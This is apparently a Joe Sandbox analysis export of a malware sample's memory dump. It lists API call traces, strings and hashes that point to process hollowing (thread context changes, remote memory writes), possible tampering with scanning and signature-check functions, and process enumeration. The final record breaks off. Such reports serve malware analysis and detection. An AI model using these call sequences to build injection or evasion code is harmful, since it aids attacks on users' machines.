                                    • Part of subcall function 02E75ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02E75BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E75B8B
                                    • Part of subcall function 02E75ACC: RegQueryValueExA.ADVAPI32(?,02E75D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02E75BD1,?,80000001), ref: 02E75BA9
                                    • Part of subcall function 02E75ACC: RegCloseKey.ADVAPI32(?,02E75BD8,00000000,?,?,00000000,02E75BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E75BCB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Open$FileModuleNameQueryValue$Close
                                  • String ID:
                                  • API String ID: 2796650324-0
                                  • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                  • Instruction ID: 23894863168c528746574c8f76bbde84fdd5ff6fa9e35fa33bcc602ad2d923b7
                                  • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                  • Instruction Fuzzy Hash: 51E06D71A403148FDB10DE98C8C0B4633D8AB08754F449961EC98CF246D7B0D9108BE0
                                  APIs
                                  • GetFileAttributesA.KERNEL32(00000000,?,02E9041B,ScanString,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,ScanString,02EF7380,02E9B7B4,UacScan,02EF7380,02E9B7B4,UacInitialize), ref: 02E77E6F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                  • Instruction ID: 8541b8306b1c51814362c42c8c4fddc62f0911c3fc4831664e3c6aaaa7110318
                                  • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                  • Instruction Fuzzy Hash: 3BC08CB03912000A1A90E6FC1CC450942C98A0413C3A4BE29B428C62E1D33298A32810
                                  APIs
                                  • timeSetEvent.WINMM(00002710,00000000,02E9C34C,00000000,00000001), ref: 02E9C368
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Eventtime
                                  • String ID:
                                  • API String ID: 2982266575-0
                                  • Opcode ID: 06d55a7643c8a139a471104b29c89ee67f71725310d0b15dc7aeeee163d0bc6d
                                  • Instruction ID: bf876b71381f013085f639159ad96e9e51e4e4a96a33d1d62a1da63122f125fc
                                  • Opcode Fuzzy Hash: 06d55a7643c8a139a471104b29c89ee67f71725310d0b15dc7aeeee163d0bc6d
                                  • Instruction Fuzzy Hash: 17C04CB07D03006AF91065695C82F23659D9349751F206452B6049D2D1D1A248504A14
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02E71A03), ref: 02E715E2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: c5db356f40560ae3fb3ee14f7542d296e27d8c2ed07d1b51bd45aab4ac497559
                                  • Instruction ID: d31e6c25bfe5f83802e0967a03f83054a1a6d22fc644d3c9667be85dcf212102
                                  • Opcode Fuzzy Hash: c5db356f40560ae3fb3ee14f7542d296e27d8c2ed07d1b51bd45aab4ac497559
                                  • Instruction Fuzzy Hash: 55F037F0B813004FDB8ACFBA99413026AE6EBCA348F60C579E709DB2C8E77194418B00
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02E716A4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: d8dd8eac89da206c44e9a4a585d2ec5df9eadc29cd986d4da3a2981d3dc61a08
                                  • Instruction ID: 2a9bb254a6eb3d037e5d488049e9a6c70e9c8916cdde9b629769db524cf0dd8d
                                  • Opcode Fuzzy Hash: d8dd8eac89da206c44e9a4a585d2ec5df9eadc29cd986d4da3a2981d3dc61a08
                                  • Instruction Fuzzy Hash: DAF0B4B2B807956BD7109F5ADC80782BB98FB40314F454139FA5C9B384D770A850CB94
                                  APIs
                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02E71FE4), ref: 02E71704
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: adade83549b59f3ff5b0671e6c83fcd314fcf0aea13e1fca9f086111547a0329
                                  • Instruction ID: fda680293609048a6357e6c262fbb1c78fe0540366c44ee11b9492cfb5b76498
                                  • Opcode Fuzzy Hash: adade83549b59f3ff5b0671e6c83fcd314fcf0aea13e1fca9f086111547a0329
                                  • Instruction Fuzzy Hash: 8AE0C275380301AFEB205FBE5D80B52BBDDEB99664F24D476F609DF291D2B0E8109B60
                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02E8AD9F,?,?,02E8AE31,00000000,02E8AF0D), ref: 02E8AB2C
                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02E8AB44
                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02E8AB56
                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02E8AB68
                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02E8AB7A
                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02E8AB8C
                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02E8AB9E
                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02E8ABB0
                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02E8ABC2
                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02E8ABD4
                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02E8ABE6
                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02E8ABF8
                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02E8AC0A
                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02E8AC1C
                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02E8AC2E
                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02E8AC40
                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02E8AC52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: AddressProc$HandleModule
                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                  • API String ID: 667068680-597814768
                                  • Opcode ID: e391a7685d6f9d14d759c42665889c4dd5b2cad67b06ae8c0ff2320e4d908b67
                                  • Instruction ID: 1a28706757843aaebb3a9597058682ea388dcd4d056a9fd401a3c81da1e17db0
                                  • Opcode Fuzzy Hash: e391a7685d6f9d14d759c42665889c4dd5b2cad67b06ae8c0ff2320e4d908b67
                                  • Instruction Fuzzy Hash: D131FFF0AC07509FEF40FFE5D884A2577A9A745705B80AD76B949CF304E678A454CF12
                                  APIs
                                  • GetThreadContext.KERNEL32(00000000,02EF7424,ScanString,02EF73A8,02E8A938,UacInitialize,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,UacInitialize,02EF73A8), ref: 02E895FE
                                    • Part of subcall function 02E87D80: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E87DF4
                                  • SetThreadContext.KERNEL32(00000000,02EF7424,ScanBuffer,02EF73A8,02E8A938,ScanString,02EF73A8,02E8A938,Initialize,02EF73A8,02E8A938,00000000,-00000008,02EF74FC,00000004,02EF7500), ref: 02E8A313
                                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02EF7424,ScanBuffer,02EF73A8,02E8A938,ScanString,02EF73A8,02E8A938,Initialize,02EF73A8,02E8A938,00000000,-00000008,02EF74FC), ref: 02E8A320
                                    • Part of subcall function 02E88954: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02EF73A8,02E8A583,ScanString,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,Initialize,02EF73A8,02E8A938,UacScan), ref: 02E88968
                                    • Part of subcall function 02E88954: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E88982
                                    • Part of subcall function 02E88954: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02EF73A8,02E8A583,ScanString,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,Initialize), ref: 02E889BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Thread$ContextLibrary$AddressFreeLoadMemoryProcResumeVirtualWrite
                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                  • API String ID: 1131989367-51457883
                                  • Opcode ID: 989711f765bb074cf78cd11b61c40649ef12515c41f0516f8d9e7fcf5297a5ff
                                  • Instruction ID: cb98298cbe1e6934225076218f176bd40553c0b64ac4265c078e70845090736e
                                  • Opcode Fuzzy Hash: 989711f765bb074cf78cd11b61c40649ef12515c41f0516f8d9e7fcf5297a5ff
                                  • Instruction Fuzzy Hash: D7E2F934AC011D9BDB51FB64EC81ACEB3BAAF95300F51E1E2B14DAB254DA30AE45CF51
                                  APIs
                                  • GetThreadContext.KERNEL32(00000000,02EF7424,ScanString,02EF73A8,02E8A938,UacInitialize,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,UacInitialize,02EF73A8), ref: 02E895FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                  • API String ID: 1591575202-51457883
                                  • Opcode ID: e787e53772895c654bf16f8fc7b607a9d9c449938dd85ad1e5413190d9e639f0
                                  • Instruction ID: b5a9a267dc05132839be6a79c4b37e680d6beec0784bb36ea3a7e06e75a00bba
                                  • Opcode Fuzzy Hash: e787e53772895c654bf16f8fc7b607a9d9c449938dd85ad1e5413190d9e639f0
                                  • Instruction Fuzzy Hash: 4BE2F934AC011D9BDB51FB64EC81ACEB3BAAF95300F51E1E2B14DAB254DA30AE45CF51
                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,02E76C1C,02E70000,02E9E790), ref: 02E75925
                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02E7593C
                                  • lstrcpynA.KERNEL32(?,?,?), ref: 02E7596C
                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02E76C1C,02E70000,02E9E790), ref: 02E759D0
                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02E76C1C,02E70000,02E9E790), ref: 02E75A06
                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02E76C1C,02E70000,02E9E790), ref: 02E75A19
                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E76C1C,02E70000,02E9E790), ref: 02E75A2B
                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E76C1C,02E70000,02E9E790), ref: 02E75A37
                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E76C1C,02E70000), ref: 02E75A6B
                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E76C1C), ref: 02E75A77
                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02E75A99
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                  • API String ID: 3245196872-1565342463
                                  • Opcode ID: eb8035191f03917e7de70f1d78a4779db21a19fcec04b80de382721dee8847a9
                                  • Instruction ID: 25c2658445aad871091bc6184b2158065c5b29457e9b9adfaed2c504acb45407
                                  • Opcode Fuzzy Hash: eb8035191f03917e7de70f1d78a4779db21a19fcec04b80de382721dee8847a9
                                  • Instruction Fuzzy Hash: E4418071D80259AFDB20DEE8CC88ADEB3BDAF08344F5495A5A958E7241E730DA449F60
                                  APIs
                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E75BE8
                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02E75BF5
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02E75BFB
                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02E75C26
                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E75C6D
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E75C7D
                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E75CA5
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E75CB5
                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02E75CDB
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02E75CEB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1599918012-2375825460
                                  • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                  • Instruction ID: 544fa3d54f0521521b304f5357cf6e3647ce28f5b4a3a8a9cfc5aa8099ecf5eb
                                  • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                  • Instruction Fuzzy Hash: 0C31C772E8026C2AFB25D6B49C45FDE77AD9B04384F4491A1AA48EA0C0DB749E848F50
                                  APIs
                                  • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02EF73A8,02E8A583,ScanString,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,Initialize,02EF73A8,02E8A938,UacScan), ref: 02E88968
                                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E88982
                                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02EF73A8,02E8A583,ScanString,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,Initialize), ref: 02E889BE
                                    • Part of subcall function 02E87D80: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E87DF4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                  • String ID: BCryptVerifySignature$bcrypt
                                  • API String ID: 1002360270-4067648912
                                  • Opcode ID: f6650bf731a8c45f05f1fabb8de5caad71350df3db0ecce64e07eba343249689
                                  • Instruction ID: 2d6ef8be81a7fddac3ece496605b3e9f4a13e8a4c2dec9ea8e47ef88608a5a31
                                  • Opcode Fuzzy Hash: f6650bf731a8c45f05f1fabb8de5caad71350df3db0ecce64e07eba343249689
                                  • Instruction Fuzzy Hash: 04F0A471AC23147EE390A7AAAC49F56B7BE93C5718F815869FE0C97240E3715C90CB50
                                  APIs
                                    • Part of subcall function 02E74F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E74F2E
                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E8DD5A), ref: 02E8DCC7
                                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E8DD01
                                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E8DD2E
                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E8DD37
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                  • String ID:
                                  • API String ID: 3764614163-0
                                  • Opcode ID: 8ff7a9f8ce4b2b9df415899d7657509e4688ffe23dbdb60dc252e3b6099092c7
                                  • Instruction ID: 559a55b49f0526e9f9ed9270ecc2b7b43cfe205f5bc8479169496f5f84ac2ab2
                                  • Opcode Fuzzy Hash: 8ff7a9f8ce4b2b9df415899d7657509e4688ffe23dbdb60dc252e3b6099092c7
                                  • Instruction Fuzzy Hash: 2521F471A80208BAEB11EAE0DD52FDEB7BDDB45B00F509561B644F71C0D7B0BA048B55
                                  APIs
                                  • RtlInitUnicodeString.NTDLL(?,?), ref: 02E8DC28
                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E8DC7A), ref: 02E8DC3E
                                  • NtDeleteFile.NTDLL(?), ref: 02E8DC5D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
